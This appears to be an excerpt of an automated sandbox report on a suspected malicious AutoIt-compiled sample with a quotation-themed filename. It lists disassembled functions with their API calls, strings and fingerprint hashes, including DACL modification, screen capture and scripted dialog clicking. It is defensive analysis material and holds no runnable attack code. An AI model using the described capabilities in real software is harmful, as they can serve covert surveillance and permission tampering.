Function 0097A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

CharLowerBuffW.USER32(?,?), ref: 0097A636
GetDriveTypeW.KERNEL32 ref: 0097A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097A730

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

Strings

wait, xrefs: 0097A6ED
set cd door , xrefs: 0097A6D1
open, xrefs: 0097A65D
close cd wait, xrefs: 0097A71B
closed, xrefs: 0097A64A, 0097A653
close, xrefs: 0097A63C
type cdaudio alias cd wait, xrefs: 0097A6AE
open , xrefs: 0097A692

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 86743351d844be430c42a4504535410d0130e01f9c44428a27d10f355206d1a5
Instruction ID: 27e400a46e10cddb06f7cabac9d02862786ea7af4eeb82197731153cd4c73125
Opcode Fuzzy Hash: 86743351d844be430c42a4504535410d0130e01f9c44428a27d10f355206d1a5
Instruction Fuzzy Hash: 9D515E716043099FC700EF14C991AAAB7F8FFC4718F04895DF899972A1DB31AE49CB52

Function 0097A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0097A47A
__swprintf.LIBCMT ref: 0097A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0097A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0097A4FE
_memset.LIBCMT ref: 0097A51D
_wcsncpy.LIBCMT ref: 0097A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0097A58E
CloseHandle.KERNEL32(00000000), ref: 0097A599
RemoveDirectoryW.KERNEL32(?), ref: 0097A5A2
CloseHandle.KERNEL32(00000000), ref: 0097A5AC

Strings

:, xrefs: 0097A4BD
\, xrefs: 0097A4B2
\??\%s, xrefs: 0097A496

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c4ec8d85530b689b40d9072d80c185daba86f27ee37fc15d354c69eb8ae44a11
Instruction ID: 672e136e414b6171ff0073705fe8baf43c1ad9746db90537dc7560e54588d701
Opcode Fuzzy Hash: c4ec8d85530b689b40d9072d80c185daba86f27ee37fc15d354c69eb8ae44a11
Instruction Fuzzy Hash: 063190B6604119ABDB219FA4DC49FEF77BCEFC8741F1081B6FA08D2160E77496448B25

Function 0094AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0094AB7B
___wtomb_environ.LIBCMT ref: 0094AB9D

Part of subcall function 00938D68: __getptd_noexit.LIBCMT ref: 00938D68

__malloc_crt.LIBCMT ref: 0094ABC5
__malloc_crt.LIBCMT ref: 0094ABE2
_free.LIBCMT ref: 0094AC19
__recalloc_crt.LIBCMT ref: 0094AC52
__recalloc_crt.LIBCMT ref: 0094AC97
_strlen.LIBCMT ref: 0094ACC3
__calloc_crt.LIBCMT ref: 0094ACCD
_strlen.LIBCMT ref: 0094ACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0094AD0A
_free.LIBCMT ref: 0094AD24
_free.LIBCMT ref: 0094AD31
_free.LIBCMT ref: 0094AD43
__invoke_watson.LIBCMT ref: 0094AD5D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: fbcc50144c40c860505af4fdca4e29e93ac33ff0ef4f1f18f9bf7e5309f2d8ab
Instruction ID: 51dec8187f5baf38dc8922df8594fee31fa84b7626060f107d91a663b80a2810
Opcode Fuzzy Hash: fbcc50144c40c860505af4fdca4e29e93ac33ff0ef4f1f18f9bf7e5309f2d8ab
Instruction Fuzzy Hash: 4361F872989306AFDB205F24DC42F6A77A9EF51321F104226F851DB2D1DB39DD80CB92

Function 0097DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0097DC7B
_wcscat.LIBCMT ref: 0097DC93
_wcscat.LIBCMT ref: 0097DCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0097DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 0097DCCE
GetFileAttributesW.KERNEL32(?), ref: 0097DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 0097DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 0097DD12

Strings

*.*, xrefs: 0097DD51

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: bc8a1db1ed9b265195ec0283aa7885b75cc67f9b3997e5713162e46ad07ac5e8
Instruction ID: 981e418503c4aaa2c859a59d221de38b4ed76e42abd26b936174396c2b4fcf5f
Opcode Fuzzy Hash: bc8a1db1ed9b265195ec0283aa7885b75cc67f9b3997e5713162e46ad07ac5e8
Instruction Fuzzy Hash: DF8160726052459FCB24DF24C885AAAB7F8BF88350F19CC2EF88DD7251E634E944CB52

Function 0099C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0099C4EC
GetFocus.USER32 ref: 0099C4FC
GetDlgCtrlID.USER32(00000000), ref: 0099C507
_memset.LIBCMT ref: 0099C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0099C65D
GetMenuItemCount.USER32(?), ref: 0099C67D
GetMenuItemID.USER32(?,00000000), ref: 0099C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0099C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0099C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0099C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0099C779

Strings

0, xrefs: 0099C62A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0be1e6adb013adab73e58233bf99320ab13d75d2e15ce09b8a1564f6a983a662
Instruction ID: 3ed85d1aa5f942f3e06a69474486bac07599246d5f06b7c03e963a86c35b43ee
Opcode Fuzzy Hash: 0be1e6adb013adab73e58233bf99320ab13d75d2e15ce09b8a1564f6a983a662
Instruction Fuzzy Hash: FF818EB0208305AFDB10DF18CD94A6BBBE9FB88354F10492EF99597291D730E945DFA2

Function 009683F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0096874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00968766
Part of subcall function 0096874A: GetLastError.KERNEL32(?,0096822A,?,?,?), ref: 00968770
Part of subcall function 0096874A: GetProcessHeap.KERNEL32(00000008,?,?,0096822A,?,?,?), ref: 0096877F
Part of subcall function 0096874A: HeapAlloc.KERNEL32(00000000,?,0096822A,?,?,?), ref: 00968786
Part of subcall function 0096874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0096879D

Part of subcall function 009687E7: GetProcessHeap.KERNEL32(00000008,00968240,00000000,00000000,?,00968240,?), ref: 009687F3
Part of subcall function 009687E7: HeapAlloc.KERNEL32(00000000,?,00968240,?), ref: 009687FA
Part of subcall function 009687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00968240,?), ref: 0096880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00968458
_memset.LIBCMT ref: 0096846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0096848C
GetLengthSid.ADVAPI32(?), ref: 0096849D
GetAce.ADVAPI32(?,00000000,?), ref: 009684DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009684F6
GetLengthSid.ADVAPI32(?), ref: 00968513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00968522
HeapAlloc.KERNEL32(00000000), ref: 00968529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0096854A
CopySid.ADVAPI32(00000000), ref: 00968551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00968582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009685A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009685BC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 6362e79ab2a7964798d3f943ddd941159362dff4f1b24c1f7ee8e5785b42016e
Instruction ID: b716878cddcdbc6c12154f972f6120c32cafd7e89536272e2caf3b3c3dde1c03
Opcode Fuzzy Hash: 6362e79ab2a7964798d3f943ddd941159362dff4f1b24c1f7ee8e5785b42016e
Instruction Fuzzy Hash: 4061297190020AABDF10DFA5DC49AAEBBBDFF44300F14826AF915E6291DB319A15DF60

Function 0098762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009876A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009876AE
CreateCompatibleDC.GDI32(?), ref: 009876BA
SelectObject.GDI32(00000000,?), ref: 009876C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0098771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00987757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0098777B
SelectObject.GDI32(00000006,?), ref: 00987783
DeleteObject.GDI32(?), ref: 0098778C
DeleteDC.GDI32(00000006), ref: 00987793
ReleaseDC.USER32(00000000,?), ref: 0098779E

Strings

(, xrefs: 00987723

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 691f1b7be62006e219cb57c4baf35a2eed3862b2ec34a11b2376c958dabbe0b8
Instruction ID: 27805a9a84f56748db1193762f1c03c53c1f28f1281b2908e8d8d45852e2a384
Opcode Fuzzy Hash: 691f1b7be62006e219cb57c4baf35a2eed3862b2ec34a11b2376c958dabbe0b8
Instruction Fuzzy Hash: 55512876904209EFCB15DFA8CC85EAEBBB9EF48710F24852AE959D7310D631A940CB60

Function 0097A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0099FB78), ref: 0097A0FC

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0097A11E
__swprintf.LIBCMT ref: 0097A177
__swprintf.LIBCMT ref: 0097A190
_wprintf.LIBCMT ref: 0097A246
_wprintf.LIBCMT ref: 0097A264

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0097A241
Error: , xrefs: 0097A20E
Line %d (File "%s"):, xrefs: 0097A171, 0097A18A
^ ERROR, xrefs: 0097A1E8
"%s" (%d) : ==> %s:, xrefs: 0097A25F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 0a11380e8f6148b51dacad2b37050d21157e50f921ecdd489b8f45339a458cd6
Instruction ID: 4509345f15f75f8968c04a752344b65146a5dc82aa1fa92863439849e05df394
Opcode Fuzzy Hash: 0a11380e8f6148b51dacad2b37050d21157e50f921ecdd489b8f45339a458cd6
Instruction Fuzzy Hash: 48514D72A4410EAACF15EBE0CD86FEEB779AF84300F104165F515621A2EB316F98DB61

Function 00916BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00930B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00916C6C,?,00008000), ref: 00930BB7

Part of subcall function 009148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009148A1,?,?,009137C0,?), ref: 009148CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00916D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00916E5A

Part of subcall function 009159CD: _wcscpy.LIBCMT ref: 00915A05

Part of subcall function 0093387D: _iswctype.LIBCMT ref: 00933885

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0094E8BF
Unterminated string, xrefs: 0094EC0D
Error opening the file, xrefs: 0094E866, 0094E8E1
AU3!, xrefs: 00916CC1
EA06, xrefs: 0094E87B
Bad directive syntax error, xrefs: 0094EBC6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0094E84A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: fc47277d99228343ce63a4854fa6099c7b23d931948406936796085e3d609e9b
Instruction ID: f9c1335e251782439c63ed8d74f070a63ca5edc6a659affa649313639d379c49
Opcode Fuzzy Hash: fc47277d99228343ce63a4854fa6099c7b23d931948406936796085e3d609e9b
Instruction Fuzzy Hash: 680288316083459FC724EF24C891AAFBBE5BFD9354F04491DF49A972A1DB30D989CB42

Function 009145DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009145F9
GetMenuItemCount.USER32(009D6890), ref: 0094D7CD
GetMenuItemCount.USER32(009D6890), ref: 0094D87D
GetCursorPos.USER32(?), ref: 0094D8C1
SetForegroundWindow.USER32(00000000), ref: 0094D8CA
TrackPopupMenuEx.USER32(009D6890,00000000,?,00000000,00000000,00000000), ref: 0094D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0094D8E9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 008db46c5600d8a05b41f181e1375a4cfbc47b116100e4f56558d6e78108c968
Instruction ID: eaa63a7dcc2c9df72e8ca3a1519af387eb211b987cddefaa1f7ae655f3ec5a02
Opcode Fuzzy Hash: 008db46c5600d8a05b41f181e1375a4cfbc47b116100e4f56558d6e78108c968
Instruction Fuzzy Hash: EC710574646209BBEB208F14DC45FAABFA8FF45368F204216F529A61E0C7B16850DB91

Function 009910A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00990038,?,?), ref: 009910BC

Strings

HKEY_USERS, xrefs: 009911BD
HKCR, xrefs: 00991164
HKLM, xrefs: 0099113A
HKCU, xrefs: 009911AC
HKEY_CURRENT_CONFIG, xrefs: 00991179
HKU, xrefs: 009911CE
HKEY_CLASSES_ROOT, xrefs: 0099114F
HKEY_LOCAL_MACHINE, xrefs: 00991125
HKCC, xrefs: 0099118A
HKEY_CURRENT_USER, xrefs: 0099119B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: cdb734d0800c1bb1c0c07bde8fd3f92247cabc688594e1becfd11a28862ca1cb
Instruction ID: ded386d0e89620fff90919fb6d20a8119bd4e619174f50e20cf938e035c3c712
Opcode Fuzzy Hash: cdb734d0800c1bb1c0c07bde8fd3f92247cabc688594e1becfd11a28862ca1cb
Instruction Fuzzy Hash: 03414A3065434F9BCF20EF98D8A1BEF37A8BF91340F504458ECA55B291DB30A95ACB61

Function 00975569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

Part of subcall function 00917A84: _memmove.LIBCMT ref: 00917B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009755D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009755E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009755F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0097560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0097561C

Strings

play PlayMe wait, xrefs: 00975606
play PlayMe, xrefs: 00975617
alias PlayMe, xrefs: 009755AB
open , xrefs: 00975581
status PlayMe mode, xrefs: 009755CD
close PlayMe, xrefs: 009755E3, 00975610

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 9f2fa73a4ad48ba4f2e8af60fad876e6359a687a902c3b56e6474001d09d93e4
Instruction ID: b366d2bdcbe2bdf8ef5dcd60389c12a331ded68872be4008045a8d2874307a62
Opcode Fuzzy Hash: 9f2fa73a4ad48ba4f2e8af60fad876e6359a687a902c3b56e6474001d09d93e4
Instruction Fuzzy Hash: 9D119421A501AE79D720B6A1CC5AEFFBB7CEFD1B08F40046DB405E20D1EEA11E45C5A2

Function 009748F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0097490E
gethostname.WSOCK32(?,00000100), ref: 00974928
gethostbyname.WSOCK32(?), ref: 00974935
_wcscpy.LIBCMT ref: 0097495D
_memmove.LIBCMT ref: 00974970
inet_ntoa.WSOCK32(?), ref: 0097497B
_strcat.LIBCMT ref: 00974989
_wcscpy.LIBCMT ref: 009749A0
WSACleanup.WSOCK32 ref: 009749AE
_wcscpy.LIBCMT ref: 009749BC

Strings

0.0.0.0, xrefs: 00974957

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: f2d038c8d58dc9ed133c0f5ff622e9ba4fa101fd958b6f67cdc25623b7659db4
Instruction ID: 0a18c4da46490a7d0167e2e2ba3503bfbd75415d2a36c5f67d32fb8feb4e65d8
Opcode Fuzzy Hash: f2d038c8d58dc9ed133c0f5ff622e9ba4fa101fd958b6f67cdc25623b7659db4
Instruction Fuzzy Hash: 6A11E732A08114ABCB24EB64DC4AFDBB7BCDF81B10F044176F509D60A2EF719AC19A61

Function 00975217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0097521C

Part of subcall function 00930719: timeGetTime.WINMM(?,75C0B400,00920FF9), ref: 0093071D

Sleep.KERNEL32(0000000A), ref: 00975248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0097526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0097528E
SetActiveWindow.USER32 ref: 009752AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009752BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 009752DA
Sleep.KERNEL32(000000FA), ref: 009752E5
